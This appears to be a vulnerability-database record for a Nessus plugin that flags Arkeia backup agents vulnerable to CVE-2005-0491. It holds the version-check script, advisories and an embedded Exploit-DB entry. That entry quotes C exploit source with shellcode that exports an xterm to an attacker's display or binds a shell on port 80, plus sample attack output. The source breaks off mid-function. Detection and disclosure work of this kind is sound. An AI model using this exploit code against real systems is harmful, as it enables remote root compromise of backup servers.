ID ARKEIA_TYPE77_OVERFLOW.NASL Type nessus Reporter This script is Copyright (C) 2005-2018 Tenable Network Security, Inc. Modified 2021-04-02T00:00:00
Description
The remote host is running the Arkeia Network Backup agent, which is used
for backups of the remote host.
The remote version of this agent contains a buffer overflow
vulnerability that may allow an attacker to execute arbitrary commands
on the remote host with the privileges of the Arkeia daemon, usually
root.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
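if(description)
{
# Registration pass: when the scanner loads the plugin in description mode
# it only publishes metadata and exits; nothing is sent to the target here.
script_id(17158);
script_version("1.18");
script_cve_id("CVE-2005-0491");
script_bugtraq_id(12594);
script_name(english:"Knox Arkeia Backup Client Type 77 Request Processing Buffer Remote Overflow");
script_set_attribute(attribute:"synopsis", value:
"The remote backup service is prone to a buffer overflow attack." );
script_set_attribute(attribute:"description", value:
"The remote host is running Arkeia Network Backup agent, used for
backups of the remote host.
The remote version of this agent contains a buffer overflow
vulnerability that may allow an attacker to execute arbitrary commands
on the remote host with the privileges of the Arkeia daemon, usually
root." );
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2005/Feb/413" );
# First fixed release on each of the three supported branches; the version
# check outside this block flags anything older on those branches.
# ("our" -> "or": the remediation text shown to users read as two versions
# joined by a typo.)
script_set_attribute(attribute:"solution", value:
"Upgrade to Arkeia 5.3.5, 5.2.28 or 5.1.21." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
# Exploit-availability attributes feed the scanner's risk ranking; they
# mirror the public references rather than anything this plugin verifies.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Arkeia Backup Client Type 77 Overflow (Win32)');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value: "2005/02/21");
script_set_attribute(attribute:"vuln_publication_date", value: "2005/02/18");
script_cvs_date("Date: 2018/11/15 20:50:22");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_summary(english:"Checks the version number of the remote arkeia daemon");
# ACT_GATHER_INFO: this is a passive, version-string check, not an attack.
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
script_family(english:"Gain a shell remotely");
script_require_ports(617);
# The version string is read from the KB key "arkeia-client/617"; presumably
# the dependency below is what populates it -- confirm against that plugin.
script_dependencie("arkeia_default_account.nasl");
exit(0);
}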
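# Scanning pass: compare the agent version recorded in the KB against the
# fixed releases (5.1.21, 5.2.28, 5.3.5) and report port 617 when the host
# runs an older build on one of those branches, or any 4.x-or-earlier / 5.0.
version = get_kb_item("arkeia-client/617");
if ( ! version ) exit(0);

# Alternatives of the pattern (POSIX regex via ereg), anchored at the start:
#   [0-4]\.            any 0.x-4.x release
#   5\.0               every 5.0 build
#   5\.1\.(0-19|20)    "1?[0-9]" covers 0-19, "20" is the last affected build
#   5\.2\.(0-19|20-27) same shape as the 5.1 branch
#   5\.3\.[0-4]
# The ([^0-9]|$) terminators keep a one- or two-digit match from reading only
# the first digit(s) of a longer, fixed build number.
#
# Fix: the 5.1 branch previously read "[0-9](1?[^0-9]|$)", which never matched
# 5.1.10-5.1.19 (false negatives) and, when a non-digit followed, matched
# 5.1.21/5.1.31/... (false positives on fixed builds). It now mirrors the
# 5.2 branch.
if ( ereg(pattern:"^([0-4]\.|5\.0|5\.1\.(1?[0-9]([^0-9]|$)|20)|5\.2\.(1?[0-9]([^0-9]|$)|2[0-7])|5\.3\.[0-4]([^0-9]|$))", string:version))
security_hole(617);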
{"id": "ARKEIA_TYPE77_OVERFLOW.NASL", "bulletinFamily": "scanner", "title": "Knox Arkeia Backup Client Type 77 Request Processing Buffer Remote Overflow", "description": "The remote host is running Arkeia Network Backup agent, used for\nbackups of the remote host. \n\nThe remote version of this agent contains a buffer overflow\nvulnerability that may allow an attacker to execute arbitrary commands\non the remote host with the privileges of the Arkeia daemon, usually\nroot.", "published": "2005-02-21T00:00:00", "modified": "2021-04-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/17158", "reporter": "This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.", "references": ["https://seclists.org/bugtraq/2005/Feb/413"], "cvelist": ["CVE-2005-0491"], "type": "nessus", "lastseen": "2021-04-01T01:26:31", "edition": 28, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-0491"]}, {"type": "saint", "idList": ["SAINT:3F5FC78DEFC236059E73F73EEAD57DB0", "SAINT:CC45EED5186609E101B411313F334ECA", "SAINT:504F3CE3B3863242033791F8E90C1EEC"]}, {"type": "osvdb", "idList": ["OSVDB:14011"]}, {"type": "exploitdb", "idList": ["EDB-ID:828", "EDB-ID:9930", "EDB-ID:16466", "EDB-ID:16865", "EDB-ID:102"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/ARKEIA/TYPE77", "MSF:EXPLOIT/OSX/ARKEIA/TYPE77"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82305"]}], "modified": "2021-04-01T01:26:31", "rev": 2}, "score": {"value": 9.0, "vector": "NONE", "modified": "2021-04-01T01:26:31", "rev": 2}, "vulnersScore": 9.0}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(17158);\n script_version(\"1.18\");\n script_cve_id(\"CVE-2005-0491\");\n script_bugtraq_id(12594);\n\n script_name(english:\"Knox Arkeia Backup Client Type 77 Request Processing Buffer Remote Overflow\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote backup service is prone to a buffer overflow attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Arkeia Network Backup agent, used for\nbackups of the remote host. \n\nThe remote version of this agent contains a buffer overflow\nvulnerability that may allow an attacker to execute arbitrary commands\non the remote host with the privileges of the Arkeia daemon, usually\nroot.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2005/Feb/413\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Arkeia 5.3.5, 5.2.28 our 5.1.21.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Arkeia Backup Client Type 77 Overflow (Win32)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/02/21\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/02/18\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n script_summary(english:\"Checks the version number of the remote arkeia daemon\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gain a shell remotely\");\n script_require_ports(617);\n script_dependencie(\"arkeia_default_account.nasl\");\n exit(0);\n}\n\n\nversion = 
get_kb_item(\"arkeia-client/617\");\nif ( ! version ) exit(0);\nif ( ereg(pattern:\"^([0-4]\\.|5\\.0|5\\.1\\.([0-9](1?[^0-9]|$)|20)|5\\.2\\.(1?[0-9]([^0-9]|$)|2[0-7])|5\\.3\\.[0-4]([^0-9]|$))\", string:version))\n\tsecurity_hole(617);\n", "naslFamily": "Gain a shell remotely", "pluginID": "17158", "cpe": [], "scheme": null, "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:24:35", "description": "Stack-based buffer overflow in Knox Arkeia Server Backup 5.3.x allows remote attackers to execute arbitrary code via a long type 77 request.", "edition": 4, "cvss3": {}, "published": "2005-05-02T04:00:00", "title": "CVE-2005-0491", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-0491"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:knox_software:arkeia_server_backup:5.3.0_rc2", "cpe:/a:knox_software:arkeia_server_backup:5.3.0_rc4", "cpe:/a:knox_software:arkeia_server_backup:5.3.0", "cpe:/a:knox_software:arkeia_server_backup:5.3.3", "cpe:/a:knox_software:arkeia_server_backup:5.3.0_rc1", "cpe:/a:knox_software:arkeia_server_backup:5.3.0_rc3", "cpe:/a:knox_software:arkeia_server_backup:5.3.2", "cpe:/a:knox_software:arkeia_server_backup:5.3.4", "cpe:/a:knox_software:arkeia_server_backup:5.3.1"], "id": "CVE-2005-0491", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0491", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:knox_software:arkeia_server_backup:5.3.0_rc1:*:*:*:*:*:*:*", "cpe:2.3:a:knox_software:arkeia_server_backup:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:knox_software:arkeia_server_backup:5.3.0_rc3:*:*:*:*:*:*:*", "cpe:2.3:a:knox_software:arkeia_server_backup:5.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:knox_software:arkeia_server_backup:5.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:knox_software:arkeia_server_backup:5.3.0_rc2:*:*:*:*:*:*:*", 
"cpe:2.3:a:knox_software:arkeia_server_backup:5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:knox_software:arkeia_server_backup:5.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:knox_software:arkeia_server_backup:5.3.0_rc4:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "description": "Added: 01/24/2006 \nCVE: [CVE-2005-0491](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0491>) \nBID: [12594](<http://www.securityfocus.com/bid/12594>) \nOSVDB: [14011](<http://www.osvdb.org/14011>) \n\n\n### Background\n\nThe [Arkeia](<http://www.arkeia.com/>) network backup software includes a daemon program called `**arkeiad**` which listens for connections on TCP port 617. \n\n### Problem\n\nA buffer overflow in the processing of type 77 requests sent to the `**arkeiad**` listener allows remote attackers to execute commands. \n\n### Resolution\n\n[Upgrade](<http://www.arkeia.com/download/index.php>) to Arkeia stable version 5.3.5 or higher. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0487.html> \n\n\n### Limitations\n\nExploit works on Arkeia Network Backup Client 5.2.27. 
\n\n### Platforms\n\nWindows \nLinux \n \n\n", "edition": 1, "modified": "2006-01-24T00:00:00", "published": "2006-01-24T00:00:00", "id": "SAINT:3F5FC78DEFC236059E73F73EEAD57DB0", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/arkeia_type_77_request", "type": "saint", "title": "Arkeia Type 77 Request buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:47", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "edition": 2, "description": "Added: 01/24/2006 \nCVE: [CVE-2005-0491](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0491>) \nBID: [12594](<http://www.securityfocus.com/bid/12594>) \nOSVDB: [14011](<http://www.osvdb.org/14011>) \n\n\n### Background\n\nThe [Arkeia](<http://www.arkeia.com/>) network backup software includes a daemon program called `**arkeiad**` which listens for connections on TCP port 617. \n\n### Problem\n\nA buffer overflow in the processing of type 77 requests sent to the `**arkeiad**` listener allows remote attackers to execute commands. \n\n### Resolution\n\n[Upgrade](<http://www.arkeia.com/download/index.php>) to Arkeia stable version 5.3.5 or higher. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0487.html> \n\n\n### Limitations\n\nExploit works on Arkeia Network Backup Client 5.2.27. 
\n\n### Platforms\n\nWindows \nLinux \n \n\n", "modified": "2006-01-24T00:00:00", "published": "2006-01-24T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/arkeia_type_77_request", "id": "SAINT:504F3CE3B3863242033791F8E90C1EEC", "title": "Arkeia Type 77 Request buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:37", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "description": "Added: 01/24/2006 \nCVE: [CVE-2005-0491](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0491>) \nBID: [12594](<http://www.securityfocus.com/bid/12594>) \nOSVDB: [14011](<http://www.osvdb.org/14011>) \n\n\n### Background\n\nThe [Arkeia](<http://www.arkeia.com/>) network backup software includes a daemon program called `**arkeiad**` which listens for connections on TCP port 617. \n\n### Problem\n\nA buffer overflow in the processing of type 77 requests sent to the `**arkeiad**` listener allows remote attackers to execute commands. \n\n### Resolution\n\n[Upgrade](<http://www.arkeia.com/download/index.php>) to Arkeia stable version 5.3.5 or higher. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0487.html> \n\n\n### Limitations\n\nExploit works on Arkeia Network Backup Client 5.2.27. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "edition": 4, "modified": "2006-01-24T00:00:00", "published": "2006-01-24T00:00:00", "id": "SAINT:CC45EED5186609E101B411313F334ECA", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/arkeia_type_77_request", "title": "Arkeia Type 77 Request buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:09", "bulletinFamily": "software", "cvelist": ["CVE-2005-0491"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Arkeia Backup Client. 
The application fails to perform proper bounds checking when processing packets marked as 'type 77' resulting in a buffer overflow. With a specially crafted type 77 request to port 617 (tcp), a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 5.1.21, 5.2.28, 5.3.5 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Restrict access to the service.\n## Short Description\nA remote overflow exists in Arkeia Backup Client. The application fails to perform proper bounds checking when processing packets marked as 'type 77' resulting in a buffer overflow. With a specially crafted type 77 request to port 617 (tcp), a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://www.arkeia.com/\nSecurity Tracker: 1013256\n[Secunia Advisory ID:14327](https://secuniaresearch.flexerasoftware.com/advisories/14327/)\nOther Advisory URL: http://metasploit.com/research/arkeia_agent/\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0397.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0433.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0487.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0420.html\nISS X-Force ID: 19398\n[CVE-2005-0491](https://vulners.com/cve/CVE-2005-0491)\n", "modified": "2005-02-18T10:13:30", "published": "2005-02-18T10:13:30", "href": "https://vulners.com/osvdb/OSVDB:14011", "id": "OSVDB:14011", "type": "osvdb", "title": "Arkeia Backup Client Type 77 Request Processing Buffer Remote Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T12:57:44", "description": "Knox Arkeia Server Backup 5.3.x Remote 
Root Exploit. CVE-2005-0491. Remote exploits for multiple platform", "published": "2005-02-18T00:00:00", "type": "exploitdb", "title": "Knox Arkeia Server Backup 5.3.x - Remote Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "modified": "2005-02-18T00:00:00", "id": "EDB-ID:828", "href": "https://www.exploit-db.com/exploits/828/", "sourceData": "/*\r\n * Knox Arkiea Server Backup\r\n * arkiead local/remote root exploit\r\n * Targets for Redhat 7.2/8.0, Win2k SP2/SP3/SP4, WinXP SP1, Win 2003 EE \r\n * Works up to current version 5.3.x \r\n *\r\n * ---------------\r\n *\r\n * Linux x86:\r\n * ./arksink2 <arkeia_host> <target_type> <display>\r\n *\r\n * Exports an xterm to the box of your choosing. Make sure to \"xhost +\" on\r\n * the box you're exporting to.\r\n * \r\n * A stack overflow is in the processing of a type 77 request. EIP is actually\r\n * overwritten at 64 bytes, but the trailing NULL scrambled a pointer so we\r\n * have to write past EIP and insert a \"safe\" value. Put this value behind your\r\n * NOP+sc return address so it doesn't mess with the sled.\r\n *\r\n * Since the buffer is so small, we initially send an invalid packet that ends\r\n * up on the heap a second before the overflow happens. If it is a high traffic\r\n * Arkeia server the heap might be a bit volatile, so play around with putting\r\n * nops+sc after the overwritten pointer. 
The heap method avoids non-exec stack\r\n * protection, however.\r\n *\r\n * Includes targets for RH8 and RH7.2\r\n * \r\n * [user@host user]$ ./prog 192.168.1.2 1 192.168.1.1:0\r\n * [*] Knox Arkeia <= v5.3.x remote root/SYSTEM exploit\r\n * [*] Attacking LINUX system\r\n * [*] Exporting xterm to 192.168.1.1:0 \r\n * [*] Connected to 192.168.1.2:617 NOP+shellcode socket\r\n * [*] Connected to 192.168.1.2:617 overflow socket\r\n * [*] Sending nops+shellcode\r\n * [*] Done, sleeping\r\n * [*] Done, check for xterm\r\n *\r\n *\r\n * ---------------\r\n * \r\n * Windows x86:\r\n * ./prog <host> <target> <offset>\r\n *\r\n * Spawns a shell on port 80 of the remote host\r\n *\r\n * EIP is overwritten beginning with the 25th byte after the header. Since Windows\r\n * is little endian and has the heap mapped to 0x00XXXXXX we can avoid having to\r\n * write an extra null past EIP. Another advantage here is that we can put all our\r\n * nops and shellcode in the same packet, but after the NULL. They will not be copied\r\n * onto the stack (and therefore not munge the pointer after it) but will remain\r\n * in memory as a raw packet. Fire up ollydbg, search for your nops and voila.\r\n *\r\n * [user@host user]$ ./arksink2 192.168.1.2 3 0\r\n * [*] Knox Arkeia <= v5.3.x remote SYSTEM exploit\r\n * [*] Attacking Windows system\r\n * [*] Spawning shell on 192.168.1.2:80\r\n * [*] Connected to 192.168.1.2:617 overflow socket\r\n * [*] Sending overflow\r\n * [*] Attempting to get remote shell, try #0\r\n * [!] connect: Resolver Error 0 (no error)\r\n * [*] Attempting to get remote shell, try #1\r\n * [!] connect: Resolver Error 0 (no error)\r\n * [*] Attempting to get remote shell, try #2\r\n * [!] connect: Resolver Error 0 (no error)\r\n * [*] Attempting to get remote shell, try #3\r\n * [!] 
connect: Resolver Error 0 (no error)\r\n * [*] Attempting to get remote shell, try #4\r\n * [*] Success, enjoy\r\n * Microsoft Windows 2000 [Version 5.00.2195]\r\n * (C) Copyright 1985-2000 Microsoft Corp.\r\n *\r\n * C:\\WINNT\\system32>whoami\r\n * whoami\r\n * SYSTEM\r\n *\r\n * C:\\WINNT\\system32>\r\n * \r\n *\r\n * ---------------\r\n * \r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <sys/socket.h>\r\n#include <sys/errno.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <arpa/nameser.h>\r\n\r\n#define BUFLEN\t\t10000\t\t/* for readshell()\t\t*/\r\n#define DATA_LEN\t1000\t\t/* overflow packet data section\t*/\r\n#define HEAD_LEN \t8\t\t/* overflow packet header\t*/\r\n#define NOP_LEN\t\t20000\t\t/* nop+shellcode packet \t*/\r\n#define\tARK_PORT\t617\t\t/* port Arkeiad listens on\t*/\r\n#define SHELL_PORT\t80\t\t/* for the windows shellcode\t*/\r\n#define NOP \t\t0x90\t\t/* Intel x86\t\t\t*/\r\n#define NUMTARGS\t5\t\t/* increase when adding targets */\r\n#define LINUX\t\t1\t\t/* Linux target type\t\t*/\r\n#define WINDOWS\t\t2\t\t/* Windows target type\t\t*/\r\n\r\nstruct {\r\n\tchar \t\t*os;\r\n\tunsigned int\ttargret;\r\n\tunsigned int\ttargsafe;\r\n\tunsigned int\tlen;\r\n\tint\t\ttargtype;\r\n} targets[] = {\r\n\t{ \"Redhat 8.0\", 0x80ecf90, 0x080e0144, 68, LINUX },\r\n\t{ \"Redhat 7.2\", 0x80eddc0, 0x080eb940, 68, LINUX },\r\n\t{ \"Windows 2k SP2, SP3, SP4\", 0x007d2144, 0xdeadbeef, 28, WINDOWS },\r\n\t{ \"Windows 2003 EE\", 0x007b2178, 0xdeadbeef, 28, WINDOWS },\r\n\t{ \"Windows XP SP1\", 0x007d20e7, 0xdeadbeef, 28, WINDOWS },\r\n\tNULL\r\n};\r\n\r\n\r\n// Linux shellcode exports xterm\r\nconst char shellcode[] 
=\r\n\"\\xeb\\x4f\\x5e\\x31\\xd2\\x88\\x56\\x14\\x88\\x56\\x18\\x88\\x56\\x21\\xb2\\x2b\"\r\n\"\\x31\\xc9\\xb1\\x09\\x80\\x3c\\x32\\x4b\\x74\\x05\\x42\\xe2\\xf7\\xeb\\x2b\\x88\"\r\n\"\\x34\\x32\\x31\\xd2\\x89\\xf3\\x89\\x76\\x36\\x8d\\x7e\\x15\\x89\\x7e\\x3a\\x8d\"\r\n\"\\x7e\\x19\\x89\\x7e\\x3e\\x8d\\x7e\\x22\\x89\\x7e\\x42\\x89\\x56\\x46\\x8d\\x4e\"\r\n\"\\x36\\x8d\\x56\\x46\\x31\\xc0\\xb0\\x0b\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\"\r\n\"\\x80\\xe8\\xac\\xff\\xff\\xff\"\r\n\"/usr/X11R6/bin/xterm8-ut8-display8\";\r\n\r\n// Windows shellcode binds shell to port 80\r\nconst char shellcode_win[] =\r\n \"\\xeb\\x19\\x5e\\x31\\xc9\\x81\\xe9\\x89\\xff\"\r\n \"\\xff\\xff\\x81\\x36\\x80\\xbf\\x32\\x94\\x81\\xee\\xfc\\xff\\xff\\xff\\xe2\\xf2\"\r\n \"\\xeb\\x05\\xe8\\xe2\\xff\\xff\\xff\\x03\\x53\\x06\\x1f\\x74\\x57\\x75\\x95\\x80\"\r\n \"\\xbf\\xbb\\x92\\x7f\\x89\\x5a\\x1a\\xce\\xb1\\xde\\x7c\\xe1\\xbe\\x32\\x94\\x09\"\r\n \"\\xf9\\x3a\\x6b\\xb6\\xd7\\x9f\\x4d\\x85\\x71\\xda\\xc6\\x81\\xbf\\x32\\x1d\\xc6\"\r\n \"\\xb3\\x5a\\xf8\\xec\\xbf\\x32\\xfc\\xb3\\x8d\\x1c\\xf0\\xe8\\xc8\\x41\\xa6\\xdf\"\r\n \"\\xeb\\xcd\\xc2\\x88\\x36\\x74\\x90\\x7f\\x89\\x5a\\xe6\\x7e\\x0c\\x24\\x7c\\xad\"\r\n \"\\xbe\\x32\\x94\\x09\\xf9\\x22\\x6b\\xb6\\xd7\\x4c\\x4c\\x62\\xcc\\xda\\x8a\\x81\"\r\n \"\\xbf\\x32\\x1d\\xc6\\xab\\xcd\\xe2\\x84\\xd7\\xf9\\x79\\x7c\\x84\\xda\\x9a\\x81\"\r\n \"\\xbf\\x32\\x1d\\xc6\\xa7\\xcd\\xe2\\x84\\xd7\\xeb\\x9d\\x75\\x12\\xda\\x6a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\xa3\\xcd\\xe2\\x84\\xd7\\x96\\x8e\\xf0\\x78\\xda\\x7a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\x9f\\xcd\\xe2\\x84\\xd7\\x96\\x39\\xae\\x56\\xda\\x4a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\x9b\\xcd\\xe2\\x84\\xd7\\xd7\\xdd\\x06\\xf6\\xda\\x5a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\x97\\xcd\\xe2\\x84\\xd7\\xd5\\xed\\x46\\xc6\\xda\\x2a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\x93\\x01\\x6b\\x01\\x53\\xa2\\x95\\x80\\xbf\\x66\\xfc\\x81\"\r\n \"\\xbe\\x32\\x94\\x7f\\xe9\\x2a\\xc4\\xd0\\xef\\x62\\xd4\\xd0\\xff\\x62\\x6b\\xd6\"\r\n 
\"\\xa3\\xb9\\x4c\\xd7\\xe8\\x5a\\x96\\x80\\xbf\\x62\\x1f\\x4c\\xd5\\x24\\xc5\\xd3\"\r\n \"\\x40\\x64\\xb4\\xd7\\xec\\xcd\\xc2\\xa4\\xe8\\x63\\xc7\\x7f\\xe9\\x1a\\x1f\\x50\"\r\n \"\\xd7\\x57\\xec\\xe5\\xbf\\x5a\\xf7\\xed\\xdb\\x1c\\x1d\\xe6\\x8f\\xb1\\x78\\xd4\"\r\n \"\\x32\\x0e\\xb0\\xb3\\x7f\\x01\\x5d\\x03\\x7e\\x27\\x3f\\x62\\x42\\xf4\\xd0\\xa4\"\r\n \"\\xaf\\x76\\x6a\\xc4\\x9b\\x0f\\x1d\\xd4\\x9b\\x7a\\x1d\\xd4\\x9b\\x7e\\x1d\\xd4\"\r\n \"\\x9b\\x62\\x19\\xc4\\x9b\\x22\\xc0\\xd0\\xee\\x63\\xc5\\xea\\xbe\\x63\\xc5\\x7f\"\r\n \"\\xc9\\x02\\xc5\\x7f\\xe9\\x22\\x1f\\x4c\\xd5\\xcd\\x6b\\xb1\\x40\\x64\\x98\\x0b\"\r\n \"\\x77\\x65\\x6b\\xd6\\x93\\xcd\\xc2\\x94\\xea\\x64\\xf0\\x21\\x8f\\x32\\x94\\x80\"\r\n \"\\x3a\\xf2\\xec\\x8c\\x34\\x72\\x98\\x0b\\xcf\\x2e\\x39\\x0b\\xd7\\x3a\\x7f\\x89\"\r\n \"\\x34\\x72\\xa0\\x0b\\x17\\x8a\\x94\\x80\\xbf\\xb9\\x51\\xde\\xe2\\xf0\\x90\\x80\"\r\n \"\\xec\\x67\\xc2\\xd7\\x34\\x5e\\xb0\\x98\\x34\\x77\\xa8\\x0b\\xeb\\x37\\xec\\x83\"\r\n \"\\x6a\\xb9\\xde\\x98\\x34\\x68\\xb4\\x83\\x62\\xd1\\xa6\\xc9\\x34\\x06\\x1f\\x83\"\r\n \"\\x4a\\x01\\x6b\\x7c\\x8c\\xf2\\x38\\xba\\x7b\\x46\\x93\\x41\\x70\\x3f\\x97\\x78\"\r\n \"\\x54\\xc0\\xaf\\xfc\\x9b\\x26\\xe1\\x61\\x34\\x68\\xb0\\x83\\x62\\x54\\x1f\\x8c\"\r\n \"\\xf4\\xb9\\xce\\x9c\\xbc\\xef\\x1f\\x84\\x34\\x31\\x51\\x6b\\xbd\\x01\\x54\\x0b\"\r\n \"\\x6a\\x6d\\xca\\xdd\\xe4\\xf0\\x90\\x80\\x2b\\xa2\\x04\";\r\n\r\n\r\nunsigned int resolve(char *hostname)\r\n{\r\n\tu_long \tip = 0;\r\n\tstruct hostent\t*hoste;\r\n\r\n\tif ((int)(ip = inet_addr(hostname)) == -1)\r\n\t{\r\n\t\tif ((hoste = gethostbyname(hostname)) == NULL)\r\n\t\t{\r\n\t\t\therror(\"[!] 
gethostbyname\");\r\n\t\t\texit(-1);\r\n\t\t}\r\n\t\tmemcpy(&ip, hoste->h_addr, hoste->h_length);\r\n\t}\r\n\treturn(ip);\r\n}\r\n\r\n\r\nint isock(char *hostname, int portnum)\r\n{\r\n\tstruct sockaddr_in\tsock_a;\r\n\tint\t\t\tnum, sock;\r\n\tunsigned int\t\tip;\r\n\tfd_set\t\t\tinput;\r\n\r\n\tsock_a.sin_family = AF_INET;\r\n\tsock_a.sin_port = htons(portnum);\r\n\tsock_a.sin_addr.s_addr = resolve(hostname);\r\n\r\n\tif ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)\r\n\t{\r\n\t\therror(\"[!] accept\");\r\n\t\treturn(-1);\r\n\t}\r\n\t\r\n\tif (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)))\r\n\t{\r\n\t\therror(\"[!] connect\");\r\n\t\treturn(-1);\r\n\t}\r\n\t\r\n\treturn(sock);\r\n\t\r\n}\r\n\r\nint usage(char *progname)\r\n{\r\n\tint \ti;\r\n\r\n\tfprintf(stderr, \"Usage:\\n%s hostname target_num display (attacking Linux)\\n\", progname);\r\n\tfprintf(stderr, \"%s hostname target_num offset (attacking Windows)\\n\", progname);\r\n\tfor (i = 0; targets[i].os; i++)\r\n\t\tfprintf(stderr, \"Target %d: %s\\n\", i+1, targets[i].os);\r\n\tfprintf(stderr, \"Example: %s 192.168.1.2 1 192.168.1.1:0\\n\", 